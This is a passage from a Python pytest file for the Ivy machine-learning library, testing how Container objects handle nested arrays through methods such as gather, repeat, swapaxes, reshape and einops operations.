container = Container(dict_in)
container_ones = container.as_ones()
assert np.allclose(ivy.to_numpy(container_ones["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones["b"]["c"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones["b"]["d"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.d), np.array([1]))
def test_container_as_zeros(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_zeros = container.as_zeros()
assert np.allclose(ivy.to_numpy(container_zeros["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros["b"]["c"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.c), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros["b"]["d"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.d), np.array([0]))
def test_container_as_bools(device, call):
dict_in = {"a": ivy.array([1], device=device), "b": {"c": [], "d": True}}
container = Container(dict_in)
container_bools = container.as_bools()
assert container_bools["a"] is True
assert container_bools.a is True
assert container_bools["b"]["c"] is False
assert container_bools.b.c is False
assert container_bools["b"]["d"] is True
assert container_bools.b.d is True
def test_container_all_true(device, call):
assert not Container(
{"a": ivy.array([1], device=device), "b": {"c": [], "d": True}}
).all_true()
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_true()
# noinspection PyBroadException
try:
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_true(assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
def test_container_all_false(device, call):
assert Container({"a": False, "b": {"c": [], "d": 0}}).all_false()
assert not Container({"a": False, "b": {"c": [1], "d": 0}}).all_false()
# noinspection PyBroadException
try:
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_false(assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
def test_container_as_random_uniform(device, call):
dict_in = {
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
container = Container(dict_in)
container_random = container.as_random_uniform()
assert (ivy.to_numpy(container_random["a"]) != np.array([1.0]))[0]
assert (ivy.to_numpy(container_random.a) != np.array([1.0]))[0]
assert (ivy.to_numpy(container_random["b"]["c"]) != np.array([2.0]))[0]
assert (ivy.to_numpy(container_random.b.c) != np.array([2.0]))[0]
assert (ivy.to_numpy(container_random["b"]["d"]) != np.array([3.0]))[0]
assert (ivy.to_numpy(container_random.b.d) != np.array([3.0]))[0]
def test_container_expand_dims(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
# without key_chains specification
container_expanded_dims = container.expand_dims(0)
assert np.allclose(ivy.to_numpy(container_expanded_dims["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims["b"]["c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([[3]]))
# with key_chains to apply
container_expanded_dims = container.expand_dims(0, ["a", "b/c"])
assert np.allclose(ivy.to_numpy(container_expanded_dims["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims["b"]["c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([3]))
# with key_chains to apply pruned
container_expanded_dims = container.expand_dims(
0, ["a", "b/c"], prune_unapplied=True
)
assert np.allclose(ivy.to_numpy(container_expanded_dims["a"]), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims["b"]["c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert "b/d" not in container_expanded_dims
# with key_chains to not apply
container_expanded_dims = container.expand_dims(
0, Container({"a": None, "b": {"d": None}}), to_apply=False
)
assert np.allclose(ivy.to_numpy(container_expanded_dims["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container_expanded_dims["b"]["c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([3]))
# with key_chains to not apply pruned
container_expanded_dims = container.expand_dims(
0,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_expanded_dims
assert np.allclose(ivy.to_numpy(container_expanded_dims["b"]["c"]), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert "b/d" not in container_expanded_dims
def test_container_clone(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# devices
devices = list()
device0 = device
devices.append(device0)
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
device1 = device[:-1] + str(idx)
devices.append(device1)
# without key_chains specification
container_cloned = container.dev_clone(devices)
assert isinstance(container_cloned, ivy.DevClonedItem)
assert min([cont.dev_str == ds for ds, cont in container_cloned.items()])
assert ivy.Container.multi_map(
lambda xs, _: ivy.arrays_equal(xs), [c for c in container_cloned.values()]
).all_true()
@pytest.mark.parametrize("devs_as_dict", [True, False])
def test_container_distribute(devs_as_dict, device, call):
array_a = ivy.array([[1], [2], [3], [4]], device=device)
array_bc = ivy.array([[2], [3], [4], [5]], device=device)
array_bd = ivy.array([[3], [4], [5], [6]], device=device)
dict_in = {"a": array_a, "b": {"c": array_bc, "d": array_bd}}
container = Container(dict_in)
batch_size = array_a.shape[0]
if call is helpers.mx_call:
# MXNet does not support splitting along an axis with a remainder after division
pytest.skip()
# devices
dev0 = device
devices = [dev0]
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
dev1 = device[:-1] + str(idx)
devices.append(dev1)
if devs_as_dict:
devices = dict(zip(devices, [int((1 / len(devices)) * 4)] * len(devices)))
num_devs = len(devices)
sub_size = int(batch_size / num_devs)
# without key_chains specification
container_dist = container.dev_dist(devices)
assert isinstance(container_dist, ivy.DevDistItem)
assert min([cont.dev_str == ds for ds, cont in container_dist.items()])
for i, sub_cont in enumerate(container_dist.values()):
assert np.array_equal(
ivy.to_numpy(sub_cont.a),
ivy.to_numpy(array_a)[i * sub_size : i * sub_size + sub_size],
)
assert np.array_equal(
ivy.to_numpy(sub_cont.b.c),
ivy.to_numpy(array_bc)[i * sub_size : i * sub_size + sub_size],
)
assert np.array_equal(
ivy.to_numpy(sub_cont.b.d),
ivy.to_numpy(array_bd)[i * sub_size : i * sub_size + sub_size],
)
def test_container_unstack(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_unstacked = container.unstack(0)
for cont, a, bc, bd in zip(container_unstacked, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont["a"]), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont["b"]["c"]), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont["b"]["d"]), np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d), np.array([bd]))
def test_container_split(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_split = container.split(1, -1)
for cont, a, bc, bd in zip(container_split, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont["a"])[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a)[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont["b"]["c"])[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c)[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont["b"]["d"])[0], np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d)[0], np.array([bd]))
def test_container_gather(device, call):
dict_in = {
"a": ivy.array([1, 2, 3, 4, 5, 6], device=device),
"b": {
"c": ivy.array([2, 3, 4, 5], device=device),
"d": ivy.array([10, 9, 8, 7, 6], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather(ivy.array([1, 3], device=device))
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["d"]), np.array([9, 7]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([9, 7]))
# with key_chains to apply
container_gathered = container.gather(
ivy.array([1, 3], device=device), -1, ["a", "b/c"]
)
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([10, 9, 8, 7, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to apply pruned
container_gathered = container.gather(
ivy.array([1, 3], device=device), -1, ["a", "b/c"], prune_unapplied=True
)
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert "b/d" not in container_gathered
# with key_chains to not apply
container_gathered = container.gather(
ivy.array([1, 3], device=device),
-1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([1, 2, 3, 4, 5, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([1, 2, 3, 4, 5, 6]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([10, 9, 8, 7, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to not apply pruned
container_gathered = container.gather(
ivy.array([1, 3], device=device),
-1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_gathered
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert "b/d" not in container_gathered
def test_container_gather_nd(device, call):
dict_in = {
"a": ivy.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]], device=device),
"b": {
"c": ivy.array([[[8, 7], [6, 5]], [[4, 3], [2, 1]]], device=device),
"d": ivy.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], device=device))
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([[6, 8], [10, 12]])
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d), np.array([[6, 8], [10, 12]])
)
# with key_chains to apply
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device), ["a", "b/c"]
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
# with key_chains to apply pruned
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device), ["a", "b/c"], prune_unapplied=True
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert "b/d" not in container_gathered
# with key_chains to not apply
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device),
Container({"a": None, "b": {"d": None}}),
to_apply=False,
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]),
np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.a),
np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
# with key_chains to not apply pruned
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device),
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_gathered
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert "b/d" not in container_gathered
def test_container_repeat(device, call):
if call is helpers.mx_call:
# MXNet does not support repeats specified as array
pytest.skip()
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], device=device), -1)
assert np.allclose(
ivy.to_numpy(container_repeated["a"]),
np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.a), np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]])
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["c"]),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.c),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["d"]),
np.array([[10.0, 10.0, 9.0, 7.0, 7.0, 7.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.d),
np.array([[10.0, 10.0, 9.0, 7.0, 7.0, 7.0]]),
)
# with key_chains to apply
container_repeated = container.repeat(
ivy.array([2, 1, 0, 3], device=device), -1, ["a", "b/c"]
)
assert np.allclose(
ivy.to_numpy(container_repeated["a"]),
np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.a), np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]])
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["c"]),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.c),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["d"]), np.array([[10.0, 9.0, 8.0, 7.0]])
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.d), np.array([[10.0, 9.0, 8.0, 7.0]])
)
# with key_chains to apply pruned
container_repeated = container.repeat(
ivy.array([2, 1, 0, 3], device=device), -1, ["a", "b/c"], prune_unapplied=True
)
assert np.allclose(
ivy.to_numpy(container_repeated["a"]),
np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.a), np.array([[0.0, 0.0, 1.0, 3.0, 3.0, 3.0]])
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["c"]),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.c),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert "b/d" not in container_repeated
# with key_chains to not apply
container_repeated = container.repeat(
ivy.array([2, 1, 0, 3], device=device),
-1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
)
assert np.allclose(
ivy.to_numpy(container_repeated["a"]), np.array([[0.0, 1.0, 2.0, 3.0]])
)
assert np.allclose(
ivy.to_numpy(container_repeated.a), np.array([[0.0, 1.0, 2.0, 3.0]])
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["c"]),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.c),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["d"]), np.array([[10.0, 9.0, 8.0, 7.0]])
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.d), np.array([[10.0, 9.0, 8.0, 7.0]])
)
# with key_chains to not apply pruned
container_repeated = container.repeat(
ivy.array([2, 1, 0, 3], device=device),
-1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_repeated
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["c"]),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.c),
np.array([[5.0, 5.0, 10.0, 20.0, 20.0, 20.0]]),
)
assert "b/d" not in container_repeated
def test_container_swapaxes(device, call):
if call is helpers.mx_call:
# MXNet does not support repeats specified as array
pytest.skip()
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_swapped = container.swapaxes(0, 1)
assert np.allclose(
ivy.to_numpy(container_swapped["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped.a), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped["b"]["c"]),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped["b"]["d"]),
np.array([[10.0], [9.0], [8.0], [7.0]]),
)
assert np.allclose(
ivy.to_numpy(container_swapped.b.d), np.array([[10.0], [9.0], [8.0], [7.0]])
)
# with key_chains to apply
container_swapped = container.swapaxes(0, 1, ["a", "b/c"])
assert np.allclose(
ivy.to_numpy(container_swapped["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped.a), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped["b"]["c"]),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped["b"]["d"]), np.array([10.0, 9.0, 8.0, 7.0])
)
assert np.allclose(
ivy.to_numpy(container_swapped.b.d), np.array([10.0, 9.0, 8.0, 7.0])
)
# with key_chains to apply pruned
container_swapped = container.swapaxes(0, 1, ["a", "b/c"], prune_unapplied=True)
assert np.allclose(
ivy.to_numpy(container_swapped["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped.a), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped["b"]["c"]),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
)
assert "b/d" not in container_swapped
# with key_chains to not apply
container_swapped = container.swapaxes(
0, 1, Container({"a": None, "b": {"d": None}}), to_apply=False
)
assert np.allclose(
ivy.to_numpy(container_swapped["a"]), np.array([0.0, 1.0, 2.0, 3.0])
)
assert np.allclose(
ivy.to_numpy(container_swapped.a), np.array([0.0, 1.0, 2.0, 3.0])
)
assert np.allclose(
ivy.to_numpy(container_swapped["b"]["c"]),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
)
assert np.allclose(
ivy.to_numpy(container_swapped["b"]["d"]), np.array([10.0, 9.0, 8.0, 7.0])
)
assert np.allclose(
ivy.to_numpy(container_swapped.b.d), np.array([10.0, 9.0, 8.0, 7.0])
)
# with key_chains to not apply pruned
container_swapped = container.swapaxes(
0,
1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_swapped
assert np.allclose(
ivy.to_numpy(container_swapped["b"]["c"]),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_swapped.b.c), np.array([[5.0], [10.0], [15.0], [20.0]])
)
assert "b/d" not in container_swapped
def test_container_reshape(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
# pre_shape only
container_reshaped = container.reshape((1, 2, 2))
assert np.allclose(
ivy.to_numpy(container_reshaped["a"]), np.array([[0.0, 1.0], [2.0, 3.0]])
)
assert np.allclose(
ivy.to_numpy(container_reshaped.a), np.array([[0.0, 1.0], [2.0, 3.0]])
)
assert np.allclose(
ivy.to_numpy(container_reshaped["b"]["c"]),
np.array([[5.0, 10.0], [15.0, 20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped.b.c), np.array([[5.0, 10.0], [15.0, 20.0]])
)
assert np.allclose(
ivy.to_numpy(container_reshaped["b"]["d"]), np.array([[10.0, 9.0], [8.0, 7.0]])
)
assert np.allclose(
ivy.to_numpy(container_reshaped.b.d), np.array([[10.0, 9.0], [8.0, 7.0]])
)
# pre_shape and slice
dict_in = {
"a": ivy.array([[[0.0, 1.0, 2.0, 3.0], [0.0, 1.0, 2.0, 3.0]]], device=device),
"b": {
"c": ivy.array([[[5.0, 10.0, 15.0], [20.0, 25.0, 30.0]]], device=device),
"d": ivy.array([[[10.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
container_reshaped = container.reshape((-1,), slice(2, None))
assert np.allclose(
ivy.to_numpy(container_reshaped["a"]),
np.array([[0.0, 1.0, 2.0, 3.0], [0.0, 1.0, 2.0, 3.0]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped.a),
np.array([[0.0, 1.0, 2.0, 3.0], [0.0, 1.0, 2.0, 3.0]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped["b"]["c"]),
np.array([[5.0, 10.0, 15.0], [20.0, 25.0, 30.0]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped.b.c),
np.array([[5.0, 10.0, 15.0], [20.0, 25.0, 30.0]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped["b"]["d"]), np.array([[10.0], [9.0]])
)
assert np.allclose(ivy.to_numpy(container_reshaped.b.d), np.array([[10.0], [9.0]]))
# pre_shape, slice and post_shape
dict_in = {
"a": ivy.array([[[0.0, 1.0, 2.0, 3.0], [0.0, 1.0, 2.0, 3.0]]], device=device),
"b": {
"c": ivy.array([[[5.0, 10.0, 15.0], [20.0, 25.0, 30.0]]], device=device),
"d": ivy.array([[[10.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
container_reshaped = container.reshape((-1,), slice(2, None), (1,))
assert np.allclose(
ivy.to_numpy(container_reshaped["a"]),
np.array([[[0.0], [1.0], [2.0], [3.0]], [[0.0], [1.0], [2.0], [3.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped.a),
np.array([[[0.0], [1.0], [2.0], [3.0]], [[0.0], [1.0], [2.0], [3.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped["b"]["c"]),
np.array([[[5.0], [10.0], [15.0]], [[20.0], [25.0], [30.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped.b.c),
np.array([[[5.0], [10.0], [15.0]], [[20.0], [25.0], [30.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_reshaped["b"]["d"]), np.array([[[10.0]], [[9.0]]])
)
assert np.allclose(
ivy.to_numpy(container_reshaped.b.d), np.array([[[10.0]], [[9.0]]])
)
def test_container_einops_rearrange(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_rearranged = container.einops_rearrange("b n -> n b")
assert np.allclose(
ivy.to_numpy(container_rearranged["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_rearranged.a), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_rearranged["b"]["c"]),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged.b.c),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged["b"]["d"]),
np.array([[10.0], [9.0], [8.0], [7.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged.b.d), np.array([[10.0], [9.0], [8.0], [7.0]])
)
def test_container_einops_reduce(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_reduced = container.einops_reduce("b n -> b", "mean")
assert np.allclose(ivy.to_numpy(container_reduced["a"]), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced.a), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced["b"]["c"]), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.c), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced["b"]["d"]), np.array([8.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.d), np.array([8.5]))
def test_container_einops_repeat(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
